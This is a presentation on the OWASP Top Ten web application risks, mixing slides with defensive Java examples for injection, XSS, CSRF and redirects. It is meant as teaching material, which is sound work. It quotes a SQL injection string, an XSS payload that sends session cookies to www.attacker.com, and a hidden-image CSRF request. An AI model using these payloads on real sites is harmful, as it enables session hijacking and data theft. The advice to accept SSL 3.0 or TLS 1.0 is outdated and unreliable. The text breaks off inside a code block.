This document summarizes a presentation on web application security risks. It discusses how most web applications are not securely developed by default and are vulnerable to attacks like injection and cross-site scripting. It introduces the OWASP Top 10 project, which identifies the top 10 security risks faced by web applications. The presentation focuses on the risks of injection and cross-site scripting attacks, and approaches for mitigating these risks, including using frameworks like Spring Security and the OWASP Enterprise Security API.
1. Hacking & OS
Is my web application secure?
OWASP Top Ten Security Risks and beyond
Carlo Bonamico
carlo.bonamico@nispro.it
NIS s.r.l. / JUG Genova
http://www.nispro.it / http://juggenova.net
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
2. Is my application secure?
Most likely not... :-(
we're used to Java/.NET robustness to buffer overflow with respect to C/C++
but now Rich Internet Applications & AJAX bring new challenges
Injection, XSS, Request Forgery...
3. We will talk about...
Why is (WebApp) Security complex?
security beyond buffer overflows
What about OWASP and Risk-based security approaches?
The OWASP Top Ten with focus on Injection and Cross Site Scripting
Risk Mitigation approaches & tools (Spring Security, ESAPI... )
And beyond...
additional tools and techniques
Acknowledgement: The Top Ten list and several concepts are reproduced under OWASP's CC license
4. What is security
From Wikipedia: Protection of Information and Information Systems from attacks, misuse, intentional and unintentional manipulation, destruction, service disruption
4 guarantees
Integrity
Availability
Confidentiality
Accountability
5. Why is security difficult?
Intrinsic complexity of
information
tools
systems
processes
“false” security perception
risks often difficult to estimate and measure
Seen only as a cost, valued only when it is missing
"it did not happen to me"
6. Consequences
Security problems often are not even detected
Security is added after-the-fact
increasing costs
limited effectiveness
Not part of
development processes
testing processes
standard training
7. State of the art
Security technologies
constant improvement
But the main concept is Security as a process
includes human factors, usability issues
includes scale issues
Effective Security involves Risk Management
evaluate and compare risks
mitigate when you cannot eliminate
Relate security to value
8. Web Application Security
Specific issues
complexity of network and protocols
power of current Browsers
interaction of heterogeneous sites, often under unrelated management
Most websites are almost open
(in)security through obscurity
social engineering attacks are easier
Need for specific approaches and tools
Need for defense in depth
9. Recommended Books
Secrets & Lies
Digital Security in a Networked World
by Bruce Schneier
http://www.schneier.com
John Wiley & Sons, 2000
10. OWASP
The Open Web Application Security Project is an open-source application
security organization
includes corporations, educational organizations, and individuals
creates freely-available articles, methodologies, documentation & tools
not affiliated with any company
OWASP approaches application security by considering all dimensions
people, process, technology
focus on developers
beyond patching...
12. And now...
OWASP Top Ten for 2010
13. Before we begin: OWASP recommendations...
Don’t stop at 10
see OWASP Developer's Guide, OWASP Testing Guide, OWASP Code Review Guide
constant stream of new attacks from “the future”
Think positive
stop chasing vulnerabilities
focus on establishing strong application security controls
Application Security Verification Standard (ASVS)
use tools wisely
Move towards a secure software development life-cycle (SDLC)
14. Top Ten Security Risks for 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
What is it?
a list of the top 10 security Risks on the Web today
risks, not most common weaknesses
15. Risk Analysis approach
OWASP approach based on standard methodologies
customized for application security
http://www.owasp.org/index.php/Threat_Risk_Modeling
Standard model
Risk = Likelihood * Impact
factors in "likelihood" and "impact" for application security
how to combine them
16. How are the risks evaluated?
Threat Agent: application-specific
Attack Vector: easy, average, difficult
Weakness Prevalence: widespread, common, uncommon
Weakness Detectability: easy, average, difficult
Technical Impact: severe, moderate, minor
Business Impact: application-specific
worst case approach
17. What is an attack?
Attacks are the techniques that agents use to exploit the vulnerabilities in
applications
Attacks are often confused with vulnerabilities
http://www.owasp.org/index.php/Category:Attack
18. What is a vulnerability?
A vulnerability is a hole or a weakness in the application
a design flaw or an implementation bug
that allows an attacker to cause harm to the stakeholders of an application
http://www.owasp.org/index.php/Category:Vulnerability
19. What is a control
Controls are defensive technologies or modules that are used to detect, deter,
or deny attacks
Examples
Authentication, Authorization, Auditing
Session Management
Input Validation
Error Handling
Cryptography
http://www.owasp.org/index.php/Category:Control
20. Sources of vulnerabilities
Missing control
no encryption of sensitive information
no access control on protected pages
Broken control
weak hash algorithm
fail open
Ignored Control
control present but not activated
21. Impact Analysis
Technical impact
on the application, the data it uses, and the functions it provides
loss of Integrity, Availability, Confidentiality, Accountability
Business impact
on process, product, service
customer relationship, reputation
law compliance
out-of-business
22. What & How to Fix
Fix the most severe risks first
does not help to fix the easy or cheap ones if they're not significant
Not all risks are worth fixing
cost of fix vs potential damage
As much as possible, re-use existing, sound, tested libraries and components
Spring Security
modular, open, not just for Spring apps
ESAPI
easy to use security controls
23. OWASP Enterprise Security API
A free, open source, web application security control library
make it easier to write lower-risk applications
make it easy to retrofit security into existing code
Language-specific versions
JAVA, .NET, PHP, Ruby...
Standard controls + extensible interfaces
ESAPI.encoder(), ESAPI.validator()
ESAPI.encryptor()
ESAPI.authenticator(),
ESAPI.accessController()
ESAPI.httpUtilities()
24. ESAPI References
Introduction to ESAPI
http://www.slideshare.net/denimgroup/enterprise-security-api-esapi-java-java-user-group-san-antonio
http://www.owasp.org/images/c/c7/ESAPI-2010-AppSecDC.pptx
ESAPI mapped to the Top Ten
http://www.jtmelton.com/2009/01/03/the-owasp-top-ten-and-esapi/
Samples
http://code.google.com/p/owasp-esapi-java-swingset
25. A1 Injection
Threat Agents
internal or external actor who can feed untrusted data
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: COMMON / Detectability: AVERAGE
Technical Impacts
SEVERE
Business Impacts
26. How it works
Attacker sends some special text that is executed by the target interpreter
any source of data is at risk: form fields, uploads, url parameters
Wide range of cases, according to the interpreter
SQL executor, LDAP, Xpath, OS commands, URL arguments
easy to discover when examining code
more difficult via testing
can result in
data loss or corruption, lack of accountability, or denial of access, sometimes
complete host takeover
27. Example Scenario: SQL Injection
Quick and dirty JDBC code
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
The attacker sends an 'id' parameter
http://example.com/app/accountView?id=' or '1'='1
View other accounts
In the worst case, the attacker uses this weakness to invoke special stored procedures or DDL queries, allowing complete DB manipulation
28. Preventing SQL Injection
Never create Statements with string manipulation
Always use PreparedStatement or CallableStatement
or a framework based on them (e.g. iBatis / myBatis, Spring JdbcTemplate)
With Hibernate/JPA HQL Injection is still possible
always use “by-name” parameters
from EntityName where id=:id
Defense in depth
minimal privileges on the DB connection
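As an added example (not the speaker's code), here is the "quick and dirty" concatenation from the previous slide next to a PreparedStatement version with positive input validation in front of it. It assumes a JDBC Connection supplied by the caller (any driver) and an accounts table with custID and owner columns; the column name owner and the digits-only format for customer IDs are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Added example, not the speaker's code. Assumes a JDBC Connection supplied by
// the caller and an "accounts" table with custID and owner columns (assumed).
public class AccountDao {

    // Deliberately vulnerable, as on the slide: the parameter becomes SQL text,
    // so the value  ' or '1'='1  turns the WHERE clause into a tautology.
    static String buildVulnerableQuery(String id) {
        return "SELECT * FROM accounts WHERE custID='" + id + "'";
    }

    // Positive input validation (defense in depth): customer IDs are assumed
    // to be 1-10 digits; anything else is rejected before reaching the DB.
    private static final Pattern CUST_ID = Pattern.compile("[0-9]{1,10}");

    static boolean isValidCustId(String id) {
        return id != null && CUST_ID.matcher(id).matches();
    }

    // Safe version: the SQL text is fixed in the source and the value is bound
    // as data, so quotes inside 'id' can never become SQL syntax.
    static List<String> findAccount(Connection conn, String id) throws SQLException {
        if (!isValidCustId(id)) {
            throw new IllegalArgumentException("invalid customer id");
        }
        List<String> rows = new ArrayList<>();
        String sql = "SELECT custID, owner FROM accounts WHERE custID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    rows.add(rs.getString("custID") + ":" + rs.getString("owner"));
                }
            }
        }
        return rows;
    }

    public static void main(String[] args) {
        String payload = "' or '1'='1";
        System.out.println("vulnerable query built from the slide's payload:");
        System.out.println("  " + buildVulnerableQuery(payload));
        System.out.println("same payload passes validation? " + isValidCustId(payload));
        System.out.println("'4242' passes validation? " + isValidCustId("4242"));
        // findAccount(conn, "4242") runs the parameterized query against a real connection.
    }
}
```

The validation is the secondary line of defense the slide calls "defense in depth"; the PreparedStatement alone already stops the injection, and the minimal-privilege DB account limits what a query could do even if both were bypassed.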
29. Hibernate & JPA
Uses PreparedStatements and SQL validation
Vulnerable to HQL injection
prefer named parameters
use Criteria queries when programmatically constructing them
See also
http://www.owasp.org/index.php/Hibernate
http://www.owasp.org/index.php/Hibernate-Guidelines
30. Other platforms
.NET
use parameterized APIs with parameter binding
SqlCommand(), OleDbCommand()
PHP
use PDO
with strongly typed bindParam()
32. A2 XSS
Threat Agents
internal or external actor who can feed untrusted data
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: VERY WIDESPREAD / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
33. How it works
Attacker sends special text that sooner or later is delivered to another web browser and executed... typically as JavaScript
almost any source of data can be an attack vector
XSS is the most prevalent web application security flaw
as an example, JSP EL Expressions like ${…} are immediately evaluated and printed to the page “as is”, thus propagating XSS
And comes in three flavors
1) Stored, 2) Reflected, 3) DOM based
34. Example Scenarios
The application dynamically generates an input field without validation or escaping
out.println("<input name='creditcard' value='" + request.getParameter("CC") + "'>");
The attacker modifies the ‘CC’ parameter in their browser to
'><script>document.location='http://www.attacker.com/saveCookie?id='+document.cookie</script>'
The victim’s session ID is sent to the attacker
ready for hijacking
35. XSS Prevention
Untrusted Data of any kind
from any source
HTTP request, URL parameters, form fields, headers, cookies
databases, web services, uploaded files...
should always be treated as though it contains an attack
since browsers are the worst mix of code and data
many different parsers (XML, HTML, JavaScript, VBScript, CSS, URL, etc...)
sanitized → encoded BEFORE being displayed or forwarded
escaping never harms
36. OWASP Positive XSS Prevention Model
An HTML page like a template
with slots where a developer is allowed to put untrusted data
untrusted data is not allowed elsewhere
"whitelist" model
similar to Firefox 4 Content Security Policy
Each of the different types of slots has slightly different security rules
attributes, body, urls, links, ...
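As an added example of the positive ("slot") model, here are three context-specific encoders written for this page; they are not ESAPI's encoder nor the speaker's code, and the class and method names are invented. Each slot gets its own rule: the HTML body only needs the five tag/entity characters replaced, a quoted attribute value is stricter (every non-alphanumeric code point is encoded), and a URL parameter goes through URLEncoder. The credit-card field from slide 34 is rendered through the attribute encoder so the slide's payload comes out inert (Java 10+ for URLEncoder.encode with a Charset).

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Added example, not the speaker's or ESAPI's code: context-specific output
// encoders in the "positive model" style, where only characters known to be
// safe in a given slot pass through unchanged and everything else is encoded.
public final class OutputEncoder {

    private static boolean isAsciiAlnum(int cp) {
        return (cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z') || (cp >= '0' && cp <= '9');
    }

    // Slot 1: HTML element body. The characters that can open a tag, start an
    // entity or close an attribute are replaced by entities.
    public static String forHtmlBody(String untrusted) {
        StringBuilder sb = new StringBuilder(untrusted.length());
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    // Slot 2: quoted HTML attribute value. Stricter: every non-alphanumeric
    // code point becomes a numeric entity, so the value can never close the
    // quote or the tag whichever quote style the template used.
    public static String forHtmlAttribute(String untrusted) {
        StringBuilder sb = new StringBuilder(untrusted.length());
        untrusted.codePoints().forEach(cp -> {
            if (isAsciiAlnum(cp)) {
                sb.appendCodePoint(cp);
            } else {
                sb.append("&#x").append(Integer.toHexString(cp)).append(';');
            }
        });
        return sb.toString();
    }

    // Slot 3: a value inside a URL query string.
    public static String forUrlParameter(String untrusted) {
        return URLEncoder.encode(untrusted, StandardCharsets.UTF_8);
    }

    // The credit-card field from slide 34, rendered through the attribute encoder.
    public static String creditCardField(String untrustedCc) {
        return "<input name='creditcard' value='" + forHtmlAttribute(untrustedCc) + "'>";
    }

    public static void main(String[] args) {
        // Constructed input: the payload shape from slide 34.
        String payload = "'><script>document.location='http://www.attacker.com/saveCookie?id='+document.cookie</script>'";
        System.out.println(creditCardField(payload));
        System.out.println(forHtmlBody("<b>Tom & Jerry</b>"));
        System.out.println("http://example.com/search?q=" + forUrlParameter("a'b c<d>"));
    }
}
```

The point of keeping three separate methods is the one the slide makes: the body encoder is not enough for an attribute, and neither is enough for a URL or a JavaScript slot, so the template author picks the encoder for the slot, never a single "escape everything" call.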
38. References
Consider employing Mozilla’s new Content Security Policy
coming out in Firefox 4
Cheat Sheets
http://ha.ckers.org/xss.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
39. A3 Broken Authentication and Session Management
Threat Agents
legitimate users, external, insider
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: COMMON / Detectability: AVERAGE
Technical Impacts
SEVERE
Business Impacts
40. Weaknesses
Developers frequently build custom authentication and session management schemes
but building these correctly is hard
Defects in areas such as logout, password management, timeouts, remember me, secret question, account update, etc.
Admin/special accounts are mostly targeted
41. Example Scenario
A) Website uses URL rewriting, leaving session ID in clear
http://travel.com/bookFlight;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Australia
link is shared in an email
session ID goes around unencrypted
B) Exceptions during login validation are not properly handled
alter the execution path
causing an unauthorized access
42. Things to be checked
Are credentials always protected when stored
using hashing or encryption?
Can credentials be guessed or altered during account management
account creation, change password, recover password?
Are session IDs
exposed in the URL (e.g., URL rewriting)?
vulnerable to session fixation?
rotated after successful login?
Are passwords, session IDs, and credentials sent only over TLS?
43. Solid Authentication and Session Management
Use a single set of strong authentication and session management controls
e.g. Spring Security and/or ESAPI Authenticator
Be sure to avoid XSS flaws
can be used to steal session IDs
Prevent brute force attacks
limit number of attempts
44. A4-Insecure Direct Object References
Threat Agents
authorized users with partial access to data
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
45. How it works
Attacker changes a parameter value
to point to another entity for which he has no access rights
Applications often use a business key
easy to guess
Applications often do not check access to a URL after the user requests it
(false) security through obscurity
46. Example
Retrieve account data without verification
query = "SELECT * FROM accts WHERE code=?";
PreparedStatement pstmt = connection.prepareStatement(query, ... );
pstmt.setString(1, request.getParameter("code"));
ResultSet results = pstmt.executeQuery();
The attacker modifies the ‘code’ parameter
http://example.com/app/accountInfo?code=notmyacct
47. How Do I Prevent Insecure Direct Object References?
Use per user or session indirect object references
instead of the resource’s database key
possibly generated through ESAPI
RandomAccessReferenceMap instance = new RandomAccessReferenceMap();
String indirectKey = instance.addDirectReference((Object) entity);
Check access
proper authorization
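As an added illustration of the per-session indirect reference idea (this is not ESAPI's RandomAccessReferenceMap, just a small map written for this page with the same two operations), the class below hands out random keys for the objects a user is allowed to reach and refuses any key it did not issue. The account numbers in main are constructed.

```java
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

// Added example, not ESAPI's RandomAccessReferenceMap: a per-session map from
// random, unguessable keys to the objects this user is allowed to reach.
public final class IndirectReferenceMap<T> {
    private static final SecureRandom RANDOM = new SecureRandom();
    private static final char[] ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789".toCharArray();
    private static final int KEY_LENGTH = 8;

    private final Map<String, T> indirectToDirect = new HashMap<>();
    private final Map<T, String> directToIndirect = new HashMap<>();

    // Register an object the current user may access and get its indirect key.
    // Registering the same object twice returns the same key.
    public synchronized String addDirectReference(T direct) {
        String existing = directToIndirect.get(direct);
        if (existing != null) {
            return existing;
        }
        String key;
        do {
            key = randomKey();
        } while (indirectToDirect.containsKey(key));
        indirectToDirect.put(key, direct);
        directToIndirect.put(direct, key);
        return key;
    }

    // Resolve a key coming from the request. Because the map is built per
    // user/session from objects they own, an unknown key is an access failure,
    // not a "not found": the request never reaches the database.
    public synchronized Optional<T> getDirectReference(String indirect) {
        return Optional.ofNullable(indirectToDirect.get(indirect));
    }

    private static String randomKey() {
        char[] out = new char[KEY_LENGTH];
        for (int i = 0; i < out.length; i++) {
            out[i] = ALPHABET[RANDOM.nextInt(ALPHABET.length)];
        }
        return new String(out);
    }

    public static void main(String[] args) {
        // Constructed data: the account numbers belonging to the logged-in user.
        IndirectReferenceMap<String> session = new IndirectReferenceMap<>();
        String k1 = session.addDirectReference("acct-1001");
        String k2 = session.addDirectReference("acct-1002");
        System.out.println("links shown to user: ?acct=" + k1 + " ?acct=" + k2);
        System.out.println("resolve " + k1 + " -> " + session.getDirectReference(k1));
        // A tampered value (another customer's account number, or a guessed key) resolves to nothing.
        System.out.println("resolve acct-1003 -> " + session.getDirectReference("acct-1003"));
    }
}
```

The map is the "check access" step of the slide in disguise: building it only from the objects the user owns is the authorization decision, and every later lookup re-applies it without another database round trip.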
48. A5-Cross-Site Request Forgery (CSRF)
Threat Agents
anyone who can trick your users into submitting a request to your website
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: WIDESPREAD / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
49. How it works
Any email, RSS feed or ad can carry forged HTTP requests and trick a victim into submitting them
via image tags, XSS, or numerous other techniques
if the user is logged in, the attack succeeds.
Easy when request details are guessable
the browser automatically sends cookies to the target server
making it difficult to distinguish good requests from bad ones
50. Example
The application allows a user to submit a state changing request that does not include anything secret. Like so:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
The attacker hides the link in an img tag
<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
If the victim's browser recently visited and logged into example.com, forged requests will include the user’s session info, inadvertently authorizing the action
51. How Do I Prevent CSRF?
Include an unpredictable token in each HTTP request
e.g. hidden field, not included in the URL
session cookies, source IP addresses, and other information that is automatically
sent doesn’t count since this information is also included in forged requests
OWASP’s CSRF Guard
automatically includes such tokens in your Java EE, .NET, or PHP application
ESAPI also includes token generators and validators
Also check the HDIV framework
http://www.hdiv.org/
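As an added example of the token approach (written for this page, not CSRFGuard's or ESAPI's code), the class below issues one unpredictable token per session, embeds it as a hidden field, and checks it in constant time before transferFunds does anything. The session is modelled as a Map so it runs without a container; the attribute and field names csrfToken and _csrf are assumptions. The main method replays slide 50: the forged img request carries the cookie but no token and is rejected, the application's own form carries the token and goes through.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Added example, not CSRFGuard's or ESAPI's code. The HTTP session is modelled
// as a Map so the block runs without a servlet container; in a real app the
// map is HttpSession and the field goes into every state-changing form.
public final class CsrfTokenService {
    private static final SecureRandom RANDOM = new SecureRandom();
    static final String SESSION_ATTR = "csrfToken"; // assumed attribute name
    static final String FIELD_NAME = "_csrf";       // assumed form field name

    // Issue a token once per session: 256 random bits, URL-safe Base64 so it
    // is safe to place in an attribute without further encoding.
    public static String tokenFor(Map<String, Object> session) {
        String token = (String) session.get(SESSION_ATTR);
        if (token == null) {
            byte[] bytes = new byte[32];
            RANDOM.nextBytes(bytes);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.put(SESSION_ATTR, token);
        }
        return token;
    }

    // The hidden field to embed in the form (never in the URL, as the slide says).
    public static String hiddenField(Map<String, Object> session) {
        return "<input type=\"hidden\" name=\"" + FIELD_NAME + "\" value=\"" + tokenFor(session) + "\">";
    }

    // Validate the token submitted with a state-changing request. Cookies are
    // sent automatically and so prove nothing; only this field proves the
    // request came from a page the application itself rendered.
    public static boolean isValid(Map<String, Object> session, String submitted) {
        String expected = (String) session.get(SESSION_ATTR);
        if (expected == null || submitted == null) {
            return false;
        }
        // constant-time comparison, so response timing does not leak the token
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     submitted.getBytes(StandardCharsets.UTF_8));
    }

    // transferFunds handler: reject before doing anything if the token is missing or wrong.
    public static String transferFunds(Map<String, Object> session, Map<String, String> params) {
        if (!isValid(session, params.get(FIELD_NAME))) {
            return "403 rejected: missing or invalid CSRF token";
        }
        return "200 transferred " + params.get("amount") + " to " + params.get("destinationAccount");
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();   // constructed: the victim's logged-in session
        System.out.println(hiddenField(session));

        // 1) Forged request from slide 50's hidden <img>: the browser adds the cookie, but no token.
        Map<String, String> forged = new HashMap<>();
        forged.put("amount", "1500");
        forged.put("destinationAccount", "attackersAcct");
        System.out.println(transferFunds(session, forged));

        // 2) Legitimate submission of the application's own form carries the token.
        Map<String, String> legit = new HashMap<>(forged);
        legit.put("destinationAccount", "4673243243");
        legit.put(FIELD_NAME, tokenFor(session));
        System.out.println(transferFunds(session, legit));
    }
}
```

Note that the check is only as good as the XSS defenses on the same site: a script injected into a page can read the hidden field, which is why slide 43 lists "avoid XSS flaws" next to the session controls.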
52. References
OWASP Cheat Sheet
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
53. A6-Security Misconfiguration
Threat Agents
anonymous & internal users wanting more access or to hide their actions
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
54. How it works
Attacker accesses
default accounts
unused pages
unpatched flaws
unprotected files and directories
Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code
Automated scanners are useful
55. Administrative Interfaces
Are a critical entry point
to application servers, virtualization environments and operating systems
Enable them on separate channels
Ensure default access credentials are changed
56. How Do I Prevent Security Misconfiguration?
Use a repeatable hardening process that makes it fast and easy to deploy secured platforms
disabling unnecessary components and services
enabling authentication
changing default credentials
see also devops
Set up a process for security updates and patches
Use minimal privileges everywhere
Perform scans and audits
57. Configuration data
review configuration for unsafe defaults
frameworks
application server
web server
db
operating system
virtual machine
create a company-wide knowledge base of secure configs and hardening how-to
integrate with open ones, including OWASP's
59. How it works
Attackers typically don’t break the crypto
They break something else
e.g. use a keylogger
or access data via channels that automatically decrypt
The most common defect is simply not encrypting sensitive data
If using crypto, beware of
unsafe key generation and storage
weak algorithms
60. How Do I Prevent Insecure Cryptographic Storage?
App-specific, but at least:
make sure you encrypt all sensitive data
ensure offsite backups are encrypted, but keys managed separately
use strong standard algorithms and strong keys; avoid Do It Yourself crypto
proper key management approaches
encrypted = ESAPI.encryptor().encrypt( decrypted );
decrypted = ESAPI.encryptor().decrypt( encrypted );
Ensure passwords are hashed and salted
Ensure all keys and passwords are protected
61. A8-Failure to Restrict URL Access
Threat Agents
users wanting to access a private page or privileged page
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: UNCOMMON / Detectability: AVERAGE
Technical Impacts
MODERATE
Business Impacts
62. How it works
Attacker, who is an authorized system user, simply changes the URL to a privileged page
Checks are not present
or checks are present but not configured correctly
or links to sensitive pages are hidden, but if the direct URL is used they are not protected
63. How Do I Prevent Failure to Restrict URL Access?
Prefer role-based policies
to minimize the effort required to maintain them
Policies should be highly and easily configurable
to minimize hard coded aspects
The enforcement mechanism should deny all by default
requiring explicit grants
In workflow interactions
check all states
64. A9-Insufficient Transport Layer Protection
Threat Agents
anyone who can monitor the traffic of your users or backend connections
Attack Vectors
Exploitability: DIFFICULT
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
65. How it works
Monitoring network traffic can be difficult
but is sometimes easy
see wireshark...
Applications often use SSL/TLS only during authentication
exposing data and session IDs to interception
or only on the front-end
leaving back-end connections to DB or JMS Servers vulnerable
Systems use old versions of SSL protocols
subject to many flaws
66. How Do I Prevent Insufficient Transport Layer Protection?
Require SSL for all sensitive pages
redirect insecure requests to the SSL page
Set the ‘secure’ flag on all sensitive cookies
Only support strong (e.g., FIPS 140-2 compliant) algorithms
at least TLS 1.0 / SSL 3.0
Ensure your certificate is valid, not expired, not revoked, and matches all domains used by the site
Backend and other connections should also use SSL
67. A10-Unvalidated Redirects and Forwards
Threat Agents
anyone who can trick your users into submitting a request to your website
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: UNCOMMON / Detectability: EASY
Technical Impacts
Impact: MODERATE
Business Impacts
68. How it works
Attacker links to unvalidated redirect and tricks victims into clicking it
http://good.com/fwd?redir=bad.com/virus.exe
properly % encoded...
Victims are more likely to click on it, since the link is to a valid site
User manipulates parameter to forward to a protected page
http://good.com/forward?path=/WEB-INF/admin.jsp
Happens when the redirect/forward url comes from a request parameter
69. How Do I Prevent Unvalidated Redirects and Forwards?
Simply avoid using redirects and forwards
if used, don’t involve parameters in calculating the destination
else, check destination against valid list (ESAPI supports this)
and verify page authorizations
Better yet, use a parameter which is a key and not a full URL
http://good.com/fwd?path=1
Use
HTTPUtilities.sendSafeRedirect()
HTTPUtilities.safeEncodeRedirectURL()
HTTPUtilities.sendSafeForward()
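As an added example of "use a parameter which is a key and not a full URL" (written for this page; it is not ESAPI's HTTPUtilities), the class below resolves the key from http://good.com/fwd?path=1 against an application-controlled allow-list, does the same for forwards, and for legacy links that still carry a full URL accepts only an exact match with a listed destination. The destinations and keys are constructed; the class needs Java 9+ for Map.of.

```java
import java.util.Map;
import java.util.Optional;

// Added example, not ESAPI's HTTPUtilities: redirects and forwards driven by a
// short key looked up in an application-controlled allow-list, so no URL or
// path taken from the request ever reaches sendRedirect()/forward() unchecked.
public final class SafeRedirects {

    // Constructed allow-list of redirect destinations, keyed as in the slide's
    // http://good.com/fwd?path=1
    private static final Map<String, String> REDIRECTS = Map.of(
            "1", "https://good.com/home",
            "2", "https://good.com/help",
            "3", "https://partner.example.org/landing");

    // Constructed allow-list of internal forward targets. Nothing under
    // WEB-INF is listed, so the slide's /WEB-INF/admin.jsp case cannot be expressed.
    private static final Map<String, String> FORWARDS = Map.of(
            "login", "/pages/login.jsp",
            "profile", "/pages/profile.jsp");

    // Resolve the key; Optional.empty() means "refuse" (send a 400 or go to the home page).
    public static Optional<String> redirectFor(String pathKey) {
        return Optional.ofNullable(pathKey).map(REDIRECTS::get);
    }

    public static Optional<String> forwardFor(String pageKey) {
        return Optional.ofNullable(pageKey).map(FORWARDS::get);
    }

    // Fallback for legacy links that still carry a full URL: accept it only if
    // it is exactly one of the allowed destinations, so prefix look-alikes
    // such as https://good.com.evil.example/ do not pass.
    public static Optional<String> redirectForUrl(String url) {
        return REDIRECTS.containsValue(url) ? Optional.of(url) : Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println("?path=1                  -> " + redirectFor("1"));
        System.out.println("?path=99                 -> " + redirectFor("99"));
        System.out.println("?redir=bad.com/virus.exe -> " + redirectForUrl("http://bad.com/virus.exe"));
        System.out.println("?page=profile            -> " + forwardFor("profile"));
        System.out.println("?page=/WEB-INF/admin.jsp -> " + forwardFor("/WEB-INF/admin.jsp"));
    }
}
```

The forward targets still need the page authorization check the slide mentions: the allow-list decides which pages a forward may reach at all, not whether this user may see them.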
70. More...
Additional Principles and Tools
71. Organizational commitment to security
Costs are not the main issue
most of the effort for secure applications also leads to better/more robust/more productive applications
Focus and culture are
what's your priority?
Commercial aspects
would you sell a wonderful car with no keys?
Mostly
training, team effort, specialist support
72. ESAPI Web Application Firewall (WAF)
Can be called separately from the other controls
Can add to an existing application
Virtual patches
Enforce authentication
Enforce access control
add input validations
add output encodings
Enforce HTTPS
sanitize HTTP headers and cookies
73. Pros and Cons
Easier and faster to apply patches without coding
no substitute for proper design and implementation
mitigation solution
See also
http://www.slideshare.net/llamakong/owasp-esapi-waf-appsec-dc-2009
74. Application Layer Logging/Intrusion Detection
Really important!
one of the most important security mechanisms
normally not done
ESAPI Intrusion Detection key features
Log Intrusion
Logout User
Disable Account
Configurable Thresholds
75. AppSensor
you report significant events by means of exceptions
invalid credentials
validation exceptions
AppSensor
collects them
presents them in a management console
produces alerts according to configurable thresholds
can take actions
lock accounts, disable IP clients
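As an added example tying slide 43 ("limit number of attempts") to the threshold features of slides 74 and 75, the monitor below counts failed logins per account inside a sliding window and, once the configurable threshold is reached, writes an intrusion log line and locks the account for a fixed period. It is written for this page and is neither ESAPI's IntrusionDetector nor AppSensor; the threshold, window, lockout, timestamps and client IP in main are constructed values.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Deque;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Added example, not ESAPI's IntrusionDetector or AppSensor: count failed
// logins per account inside a sliding window and, past a configurable
// threshold, log the event and lock the account for a while.
public final class LoginAttemptMonitor {
    private final int threshold;       // failures allowed inside the window
    private final Duration window;     // sliding window length
    private final Duration lockout;    // how long the account stays locked
    private final Map<String, Deque<Instant>> failures = new HashMap<>();
    private final Map<String, Instant> lockedUntil = new HashMap<>();
    private final List<String> securityLog = new ArrayList<>();

    public LoginAttemptMonitor(int threshold, Duration window, Duration lockout) {
        this.threshold = threshold;
        this.window = window;
        this.lockout = lockout;
    }

    // Check before even validating the password; a locked account gets a generic failure.
    public synchronized boolean isLocked(String account, Instant now) {
        Instant until = lockedUntil.get(account);
        if (until == null) {
            return false;
        }
        if (!now.isBefore(until)) {
            lockedUntil.remove(account);   // lock expired
            return false;
        }
        return true;
    }

    // Call on every failed login. Returns true if this failure triggered a lock.
    public synchronized boolean recordFailure(String account, String clientIp, Instant now) {
        Deque<Instant> recent = failures.computeIfAbsent(account, k -> new ArrayDeque<>());
        recent.addLast(now);
        Instant cutoff = now.minus(window);
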